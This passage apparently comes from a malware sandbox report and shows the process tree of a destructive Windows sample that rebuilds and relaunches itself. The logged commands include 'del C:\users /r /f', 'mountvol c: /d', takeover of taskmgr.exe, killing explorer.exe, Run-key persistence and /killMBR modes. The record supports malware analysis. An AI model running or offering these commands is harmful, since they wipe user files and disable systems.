        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        6⤵
        
        PID:15520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
    3⤵
    PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+519110.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
      4⤵
      PID:3436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe 1698005182
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe 1698005182
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:2900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+17838.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        8⤵
        
        PID:912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe 1698005182
        8⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe 1698005182
        9⤵
        Executes dropped EXE
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /protect 1698005182
        10⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /protect 1698005182
        11⤵
        Executes dropped EXE
        
        PID:7120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe+727244.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
        12⤵
        
        PID:3932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe 1698005182
        12⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe 1698005182
        13⤵
        Executes dropped EXE
        
        PID:8572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /autoup 1698005182
        14⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /autoup 1698005182
        15⤵
        
        PID:9608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /killwindows 1698005182
        14⤵
        
        PID:10372
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /killwindows 1698005182
        15⤵
        
        PID:11852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        16⤵
        
        PID:14856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /KillHardDisk 1698005182
        14⤵
        
        PID:12616
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /KillHardDisk 1698005182
        15⤵
        
        PID:11620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        16⤵
        
        PID:14004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /killMBR 1698005182
        14⤵
        
        PID:14340
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe /killMBR 1698005182
        15⤵
        
        PID:5088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30511.exe 1698005182
        12⤵
        
        PID:10000
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30511.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30511.exe 1698005182
        13⤵
        
        PID:6304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:8560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:6544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30511.exe /autoup 1698005182
        14⤵
        
        PID:14924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe+131858.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30511.exe
        12⤵
        
        PID:9084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        Suspicious use of WriteProcessMemory
        
        PID:708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /save 1698005182
        10⤵
        
        PID:6224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /autoup 1698005182
        10⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /autoup 1698005182
        11⤵
        
        PID:1080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /killwindows 1698005182
        10⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /killwindows 1698005182
        11⤵
        
        PID:10948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:11188
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:13724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:16096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /KillHardDisk 1698005182
        10⤵
        
        PID:11620
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /KillHardDisk 1698005182
        11⤵
        
        PID:13456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:14636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:15040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /killMBR 1698005182
        10⤵
        
        PID:13704
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /killMBR 1698005182
        11⤵
        
        PID:15556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /protect 1698005182
        10⤵
        
        PID:992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+99652.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
        8⤵
        
        PID:5200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe 1698005182
        8⤵
        
        PID:5808
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:1316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+728290.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        8⤵
        
        PID:1932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
        8⤵
        
        PID:7068
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
        9⤵
        Executes dropped EXE
        
        PID:7288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
        10⤵
        
        PID:10048
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
        11⤵
        
        PID:6388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
        10⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
        11⤵
        
        PID:11232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:11972
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:6692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\explorer.exe
        12⤵
        
        PID:13984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
        10⤵
        
        PID:11588
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
        11⤵
        
        PID:13480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
        10⤵
        
        PID:11768
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
        11⤵
        
        PID:16196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /protect 1698005182
        10⤵
        
        PID:1740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+08298.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        8⤵
        
        PID:7984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
        8⤵
        
        PID:8536
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
        9⤵
        
        PID:8728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:9532
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe+05747.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
        7⤵
        
        PID:6724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe+024005.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
        7⤵
        
        PID:2276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe 1698005182
        7⤵
        
        PID:6916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:5916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:6200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+63017.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3056.exe
        8⤵
        
        PID:6536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3056.exe 1698005182
        8⤵
        
        PID:10148
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3056.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3056.exe 1698005182
        9⤵
        
        PID:3596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:8232
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:8628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:9624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
        6⤵
        
        PID:8592
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
        7⤵
        
        PID:7328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killwindows 1698005182
        6⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killwindows 1698005182
        7⤵
        
        PID:11104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:11800
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:13964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /KillHardDisk 1698005182
        6⤵
        
        PID:11632
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /KillHardDisk 1698005182
        7⤵
        
        PID:10944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:14500
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killMBR 1698005182
        6⤵
        
        PID:12096
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killMBR 1698005182
        7⤵
        
        PID:13360
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:5376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+81798.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
      4⤵
      PID:3936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe 1698005182
      4⤵
      PID:708
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:3076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:2240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe 1698005182
        8⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe 1698005182
        9⤵
        Executes dropped EXE
        
        PID:7516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /autoup 1698005182
        10⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /autoup 1698005182
        11⤵
        Adds Run key to start application
        
        PID:6760
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:7532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
        10⤵
        
        PID:9316
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
        11⤵
        
        PID:9408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:4836
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:13972
        
        C:\Windows\system32\cmd.exe
        
